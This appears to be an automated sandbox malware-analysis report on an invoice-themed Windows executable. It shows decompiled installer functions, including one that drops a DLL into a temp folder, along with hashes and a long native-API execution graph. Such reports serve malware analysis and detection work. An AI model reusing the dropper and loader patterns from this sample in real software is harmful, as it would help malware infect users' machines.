                  Similarity
                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                  • String ID:
                  • API String ID: 1404258612-0
                  • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                  • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                  • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                  • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                  Download Yara Rule
                  C-Code - Quality: 67%
                  			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                  0x00401d29
                  0x00401d42
                  0x00401d4c
                  0x00401d51
                  0x00401d5c
                  0x00401d63
                  0x00401d75
                  0x00401d7b
                  0x00401d80
                  0x00401d8a
                  0x004024aa
                  0x00401561
                  0x00402825
                  0x00402880
                  0x0040288c

                  APIs
                  • GetDC.USER32(?), ref: 00401D22
                  • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                  • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: CapsCreateDeviceFontIndirect
                  • String ID:
                  • API String ID: 3272661963-0
                  • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                  • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                  • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                  • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404D73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}




                  0x00404d7f
                  0x00404da4
                  0x00404dc4
                  0x00404dc7
                  0x00404dca
                  0x00404de1
                  0x00404de7
                  0x00404dee
                  0x00404df5
                  0x00404dfc
                  0x00404e01
                  0x00404e07
                  0x00000000
                  0x00404e17
                  0x00404db1
                  0x00404e04
                  0x00404e04
                  0x00000000
                  0x00404e04
                  0x00404dbd
                  0x00404dbf
                  0x00000000
                  0x00404dbf
                  0x00404d85
                  0x00000000
                  0x00000000
                  0x00404d8c
                  0x00000000

                  APIs
                  • IsWindowVisible.USER32(?), ref: 00404DA9
                  • CallWindowProcA.USER32 ref: 00404E17
                    • Part of subcall function 00403E83: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E95
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Window$CallMessageProcSendVisible
                  • String ID:
                  • API String ID: 3748168415-3916222277
                  • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                  • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                  • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                  • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004024B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                  0x004024b0
                  0x004024b0
                  0x004024b3
                  0x004024ce
                  0x004024b5
                  0x004024b7
                  0x004024bc
                  0x004024c3
                  0x004024d5
                  0x0040264e
                  0x0040264e
                  0x004024db
                  0x004024ed
                  0x004015a6
                  0x004015a8
                  0x00000000
                  0x004015ae
                  0x004015a8
                  0x00402880
                  0x0040288c

                  APIs
                  • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                  Strings
                  • C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll, xrefs: 004024BC, 004024E1
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: FileWritelstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll
                  • API String ID: 427699356-555145884
                  • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                  • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                  • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                  • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004055BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                  0x004055c0
                  0x004055ca
                  0x004055cc
                  0x004055d3
                  0x004055db
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004055db
                  0x004055dd
                  0x004055e2

                  APIs
                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\overdue invoices.exe,C:\Users\user\Desktop\overdue invoices.exe,80000000,00000003), ref: 004055C5
                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\overdue invoices.exe,C:\Users\user\Desktop\overdue invoices.exe,80000000,00000003), ref: 004055D3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: CharPrevlstrlen
                  • String ID: C:\Users\user\Desktop
                  • API String ID: 2709904686-3125694417
                  • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                  • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                  • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                  • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004056D1 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                  0x004056dd
                  0x004056df
                  0x00405707
                  0x004056ec
                  0x004056f1
                  0x004056fc
                  0x00000000
                  0x00405719
                  0x00405705
                  0x00405705
                  0x00000000

                  APIs
                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: lstrlen$CharNextlstrcmpi
                  • String ID:
                  • API String ID: 190613189-0
                  • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                  • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                  • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                  • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:5.5%
                  Dynamic/Decrypted Code Coverage:2.7%
                  Signature Coverage:5.5%
                  Total number of Nodes:598
                  Total number of Limit Nodes:75
                  execution_graph 26843 41d480 26846 419bf0 26843->26846 26847 419c16 26846->26847 26858 408b60 26847->26858 26849 419c22 26857 419c69 26849->26857 26866 40d170 26849->26866 26851 419c37 26852 419c4c 26851->26852 26914 418930 26851->26914 26878 40a610 26852->26878 26855 419c5b 26856 418930 2 API calls 26855->26856 26856->26857 26917 408ab0 26858->26917 26860 408b6d 26861 408b74 26860->26861 26929 408a50 26860->26929 26861->26849 26867 40d19c 26866->26867 27348 40a010 26867->27348 26869 40d1ae 27352 40d080 26869->27352 26872 40d1e1 26875 40d1f2 26872->26875 26877 418710 2 API calls 26872->26877 26873 40d1c9 26874 40d1d4 26873->26874 26876 418710 2 API calls 26873->26876 26874->26851 26875->26851 26876->26874 26877->26875 26879 40a635 26878->26879 26880 40a010 LdrLoadDll 26879->26880 26881 40a68c 26880->26881 27371 409c90 26881->27371 26883 40a6b2 26913 40a903 26883->26913 27380 4133a0 26883->27380 26885 40a6f7 26885->26913 27383 4079d0 26885->27383 26887 40a73b 26887->26913 27390 418780 26887->27390 26891 40a791 26892 40a798 26891->26892 27402 418290 26891->27402 26893 41a0a0 2 API calls 26892->26893 26895 40a7a5 26893->26895 26895->26855 26897 40a7e2 26898 41a0a0 2 API calls 26897->26898 26899 40a7e9 26898->26899 26899->26855 26900 40a7f2 26901 40d200 3 API calls 26900->26901 26902 40a866 26901->26902 26902->26892 26903 40a871 26902->26903 26904 41a0a0 2 API calls 26903->26904 26905 40a895 26904->26905 27407 4182e0 26905->27407 26908 418290 2 API calls 26909 40a8d0 26908->26909 26909->26913 27412 4180a0 26909->27412 26912 418930 2 API calls 26912->26913 26913->26855 26915 41894f ExitProcess 26914->26915 26916 4191e0 LdrLoadDll 26914->26916 26916->26915 26948 416e50 26917->26948 26921 408ad6 26921->26860 26922 408acc 26922->26921 26955 419530 26922->26955 26924 408b13 26924->26921 26966 4088d0 26924->26966 26926 408b33 26972 408320 LdrLoadDll 26926->26972 26928 408b45 26928->26860 26930 408a6a 26929->26930 26931 419820 LdrLoadDll 26929->26931 27323 419820 26930->27323 26931->26930 26934 419820 LdrLoadDll 26935 408a91 26934->26935 26936 40cf70 26935->26936 26937 40cf89 26936->26937 27331 409e90 26937->27331 26939 40cf9c 27335 418460 26939->27335 26942 408b85 26942->26849 26944 40cfc2 26945 40cfed 26944->26945 27341 4184e0 26944->27341 26947 418710 2 API calls 26945->26947 26947->26942 26949 416e5f 26948->26949 26973 413e50 26949->26973 26951 408ac3 26952 416d00 26951->26952 26979 418880 26952->26979 26956 419549 26955->26956 26986 413a50 26956->26986 26958 419561 26959 41956a 26958->26959 27025 419370 26958->27025 26959->26924 26961 41957e 26961->26959 27043 418180 26961->27043 27301 406e20 26966->27301 26968 4088f1 26968->26926 26969 4088ea 26969->26968 27314 4070e0 26969->27314 26972->26928 26974 413e5e 26973->26974 26976 413e6a 26973->26976 26974->26976 26978 4142d0 LdrLoadDll 26974->26978 26976->26951 26977 413fbc 26977->26951 26978->26977 26980 416d15 26979->26980 26982 4191e0 26979->26982 26980->26922 26983 4191f0 26982->26983 26985 419212 26982->26985 26984 413e50 LdrLoadDll 26983->26984 26984->26985 26985->26980 26987 413d85 26986->26987 26997 413a64 26986->26997 26987->26958 26990 413b90 27054 4185e0 26990->27054 26991 413b73 27111 4186e0 LdrLoadDll 26991->27111 26994 413bb7 26996 41a0a0 2 API calls 26994->26996 26995 413b7d 26995->26958 27000 413bc3 26996->27000 26997->26987 27051 417ed0 26997->27051 26998 413d49 26999 418710 2 API calls 26998->26999 27002 413d50 26999->27002 27000->26995 27000->26998 27001 413d5f 27000->27001 27005 413c52 27000->27005 27120 413790 LdrLoadDll NtReadFile NtClose 27001->27120 27002->26958 27004 413d72 27004->26958 27006 413cb9 27005->27006 27008 413c61 27005->27008 27006->26998 27007 413ccc 27006->27007 27113 418560 27007->27113 27010 413c66 27008->27010 27011 413c7a 27008->27011 27112 413650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27010->27112 27014 413c97 27011->27014 27015 413c7f 27011->27015 27014->27002 27069 413410 27014->27069 27057 4136f0 27015->27057 27018 413c70 27018->26958 27019 413c8d 27019->26958 27021 413d2c 27117 418710 27021->27117 27022 413caf 27022->26958 27024 413d38 27024->26958 27026 419381 27025->27026 27027 419393 27026->27027 27138 41a020 27026->27138 27027->26961 27029 4193b4 27141 413060 27029->27141 27031 419400 27031->26961 27032 4193d7 27032->27031 27033 413060 3 API calls 27032->27033 27035 4193f9 27033->27035 27035->27031 27173 414390 27035->27173 27036 41948a 27037 41949a 27036->27037 27267 419180 LdrLoadDll 27036->27267 27183 418ff0 27037->27183 27040 4194c8 27262 418140 27040->27262 27044 41819c 27043->27044 27045 4191e0 LdrLoadDll 27043->27045 27295 9d967a 27044->27295 27045->27044 27046 4181b7 27048 41a0a0 27046->27048 27298 4188f0 27048->27298 27050 4195d9 27050->26924 27052 413b44 27051->27052 27053 4191e0 LdrLoadDll 27051->27053 27052->26990 27052->26991 27052->26995 27053->27052 27055 4191e0 LdrLoadDll 27054->27055 27056 4185fc NtCreateFile 27055->27056 27056->26994 27058 41370c 27057->27058 27059 418560 LdrLoadDll 27058->27059 27060 41372d 27059->27060 27061 413734 27060->27061 27062 413748 27060->27062 27063 418710 2 API calls 27061->27063 27064 418710 2 API calls 27062->27064 27065 41373d 27063->27065 27066 413751 27064->27066 27065->27019 27121 41a2b0 LdrLoadDll RtlAllocateHeap 27066->27121 27068 41375c 27068->27019 27070 41345b 27069->27070 27071 41348e 27069->27071 27072 418560 LdrLoadDll 27070->27072 27073 4135d9 27071->27073 27077 4134aa 27071->27077 27075 413476 27072->27075 27074 418560 LdrLoadDll 27073->27074 27081 4135f4 27074->27081 27076 418710 2 API calls 27075->27076 27078 41347f 27076->27078 27079 418560 LdrLoadDll 27077->27079 27078->27022 27080 4134c5 27079->27080 27083 4134e1 27080->27083 27084 4134cc 27080->27084 27134 4185a0 LdrLoadDll 27081->27134 27085 4134e6 27083->27085 27086 4134fc 27083->27086 27088 418710 2 API calls 27084->27088 27089 418710 2 API calls 27085->27089 27097 413501 27086->27097 27122 41a270 27086->27122 27087 41362e 27090 418710 2 API calls 27087->27090 27091 4134d5 27088->27091 27092 4134ef 27089->27092 27093 413639 27090->27093 27091->27022 27092->27022 27093->27022 27096 413567 27098 41357e 27096->27098 27133 418520 LdrLoadDll 27096->27133 27104 413513 27097->27104 27125 418690 27097->27125 27100 413585 27098->27100 27101 41359a 27098->27101 27102 418710 2 API calls 27100->27102 27103 418710 2 API calls 27101->27103 27102->27104 27105 4135a3 27103->27105 27104->27022 27106 4135cf 27105->27106 27128 419e70 27105->27128 27106->27022 27108 4135ba 27109 41a0a0 2 API calls 27108->27109 27110 4135c3 27109->27110 27110->27022 27111->26995 27112->27018 27114 4191e0 LdrLoadDll 27113->27114 27115 413d14 27113->27115 27114->27115 27116 4185a0 LdrLoadDll 27115->27116 27116->27021 27118 41872c NtClose 27117->27118 27119 4191e0 LdrLoadDll 27117->27119 27118->27024 27119->27118 27120->27004 27121->27068 27124 41a288 27122->27124 27135 4188b0 27122->27135 27124->27097 27126 4186ac NtReadFile 27125->27126 27127 4191e0 LdrLoadDll 27125->27127 27126->27096 27127->27126 27129 419e94 27128->27129 27130 419e7d 27128->27130 27129->27108 27130->27129 27131 41a270 2 API calls 27130->27131 27132 419eab 27131->27132 27132->27108 27133->27098 27134->27087 27136 4191e0 LdrLoadDll 27135->27136 27137 4188cc RtlAllocateHeap 27136->27137 27137->27124 27268 4187c0 27138->27268 27140 41a04d 27140->27029 27142 413071 27141->27142 27143 413079 27141->27143 27142->27032 27172 41334c 27143->27172 27271 41b250 27143->27271 27145 4130cd 27146 41b250 2 API calls 27145->27146 27149 4130d8 27146->27149 27147 413126 27150 41b250 2 API calls 27147->27150 27149->27147 27151 41b380 3 API calls 27149->27151 27282 41b2f0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 27149->27282 27153 41313a 27150->27153 27151->27149 27152 413197 27154 41b250 2 API calls 27152->27154 27153->27152 27276 41b380 27153->27276 27156 4131ad 27154->27156 27157 4131ea 27156->27157 27159 41b380 3 API calls 27156->27159 27158 41b250 2 API calls 27157->27158 27160 4131f5 27158->27160 27159->27156 27161 41b380 3 API calls 27160->27161 27167 41322f 27160->27167 27161->27160 27163 413324 27284 41b2b0 LdrLoadDll RtlFreeHeap 27163->27284 27165 41332e 27285 41b2b0 LdrLoadDll RtlFreeHeap 27165->27285 27283 41b2b0 LdrLoadDll RtlFreeHeap 27167->27283 27168 413338 27286 41b2b0 LdrLoadDll RtlFreeHeap 27168->27286 27170 413342 27287 41b2b0 LdrLoadDll RtlFreeHeap 27170->27287 27172->27032 27174 4143a1 27173->27174 27175 413a50 8 API calls 27174->27175 27177 4143b7 27175->27177 27176 41440a 27176->27036 27177->27176 27178 4143f2 27177->27178 27179 414405 27177->27179 27181 41a0a0 2 API calls 27178->27181 27180 41a0a0 2 API calls 27179->27180 27180->27176 27182 4143f7 27181->27182 27182->27036 27184 419004 27183->27184 27185 418eb0 LdrLoadDll 27183->27185 27288 418eb0 27184->27288 27185->27184 27187 41900d 27188 418eb0 LdrLoadDll 27187->27188 27189 419016 27188->27189 27190 418eb0 LdrLoadDll 27189->27190 27191 41901f 27190->27191 27192 418eb0 LdrLoadDll 27191->27192 27193 419028 27192->27193 27194 418eb0 LdrLoadDll 27193->27194 27195 419031 27194->27195 27196 418eb0 LdrLoadDll 27195->27196 27197 41903d 27196->27197 27198 418eb0 LdrLoadDll 27197->27198 27199 419046 27198->27199 27200 418eb0 LdrLoadDll 27199->27200 27201 41904f 27200->27201 27202 418eb0 LdrLoadDll 27201->27202 27203 419058 27202->27203 27204 418eb0 LdrLoadDll 27203->27204 27205 419061 27204->27205 27206 418eb0 LdrLoadDll 27205->27206 27207 41906a 27206->27207 27208 418eb0 LdrLoadDll 27207->27208 27209 419076 27208->27209 27210 418eb0 LdrLoadDll 27209->27210 27211 41907f 27210->27211 27212 418eb0 LdrLoadDll 27211->27212 27213 419088 27212->27213 27214 418eb0 LdrLoadDll 27213->27214 27215 419091 27214->27215 27216 418eb0 LdrLoadDll 27215->27216 27217 41909a 27216->27217 27218 418eb0 LdrLoadDll 27217->27218 27219 4190a3 27218->27219 27220 418eb0 LdrLoadDll 27219->27220 27221 4190af 27220->27221 27222 418eb0 LdrLoadDll 27221->27222 27223 4190b8 27222->27223 27224 418eb0 LdrLoadDll 27223->27224 27225 4190c1 27224->27225 27226 418eb0 LdrLoadDll 27225->27226 27227 4190ca 27226->27227 27228 418eb0 LdrLoadDll 27227->27228 27229 4190d3 27228->27229 27230 418eb0 LdrLoadDll 27229->27230 27231 4190dc 27230->27231 27232 418eb0 LdrLoadDll 27231->27232 27233 4190e8 27232->27233 27234 418eb0 LdrLoadDll 27233->27234 27235 4190f1 27234->27235 27236 418eb0 LdrLoadDll 27235->27236 27237 4190fa 27236->27237 27238 418eb0 LdrLoadDll 27237->27238 27239 419103 27238->27239 27240 418eb0 LdrLoadDll 27239->27240 27241 41910c 27240->27241 27242 418eb0 LdrLoadDll 27241->27242 27243 419115 27242->27243 27244 418eb0 LdrLoadDll 27243->27244 27245 419121 27244->27245 27246 418eb0 LdrLoadDll 27245->27246 27247 41912a 27246->27247 27248 418eb0 LdrLoadDll 27247->27248 27249 419133 27248->27249 27250 418eb0 LdrLoadDll 27249->27250 27251 41913c 27250->27251 27252 418eb0 LdrLoadDll 27251->27252 27253 419145 27252->27253 27254 418eb0 LdrLoadDll 27253->27254 27255 41914e 27254->27255 27256 418eb0 LdrLoadDll 27255->27256 27257 41915a 27256->27257 27258 418eb0 LdrLoadDll 27257->27258 27259 419163 27258->27259 27260 418eb0 LdrLoadDll 27259->27260 27261 41916c 27260->27261 27261->27040 27263 4191e0 LdrLoadDll 27262->27263 27264 41815c 27263->27264 27294 9d9860 LdrInitializeThunk 27264->27294 27265 418173 27265->26961 27267->27037 27269 4191e0 LdrLoadDll 27268->27269 27270 4187dc NtAllocateVirtualMemory 27269->27270 27270->27140 27272 41b260 27271->27272 27273 41b266 27271->27273 27272->27145 27274 41a270 2 API calls 27273->27274 27275 41b28c 27274->27275 27275->27145 27277 41b2f0 27276->27277 27278 41a270 2 API calls 27277->27278 27279 41b34d 27277->27279 27280 41b32a 27278->27280 27279->27153 27281 41a0a0 2 API calls 27280->27281 27281->27279 27282->27149 27283->27163 27284->27165 27285->27168 27286->27170 27287->27172 27289 418ecb 27288->27289 27290 413e50 LdrLoadDll 27289->27290 27291 418eeb 27290->27291 27292 413e50 LdrLoadDll 27291->27292 27293 418f97 27291->27293 27292->27293 27293->27187 27293->27293 27294->27265 27296 9d968f LdrInitializeThunk 27295->27296 27297 9d9681 27295->27297 27296->27046 27297->27046 27299 41890c RtlFreeHeap 27298->27299 27300 4191e0 LdrLoadDll 27298->27300 27299->27050 27300->27299 27302 406e30 27301->27302 27303 406e2b 27301->27303 27304 41a020 2 API calls 27302->27304 27303->26969 27311 406e55 27304->27311 27305 406eb8 27305->26969 27306 418140 2 API calls 27306->27311 27307 406ebe 27308 406ee4 27307->27308 27310 418840 2 API calls 27307->27310 27308->26969 27312 406ed5 27310->27312 27311->27305 27311->27306 27311->27307 27313 41a020 2 API calls 27311->27313 27317 418840 27311->27317 27312->26969 27313->27311 27315 4070fe 27314->27315 27316 418840 2 API calls 27314->27316 27315->26926 27316->27315 27318 4191e0 LdrLoadDll 27317->27318 27319 41885c 27318->27319 27322 9d96e0 LdrInitializeThunk 27319->27322 27320 418873 27320->27311 27322->27320 27324 419843 27323->27324 27327 409b40 27324->27327 27328 409b64 27327->27328 27329 409ba0 LdrLoadDll 27328->27329 27330 408a7b 27328->27330 27329->27330 27330->26934 27332 409eb3 27331->27332 27333 409f30 27332->27333 27346 417f10 LdrLoadDll 27332->27346 27333->26939 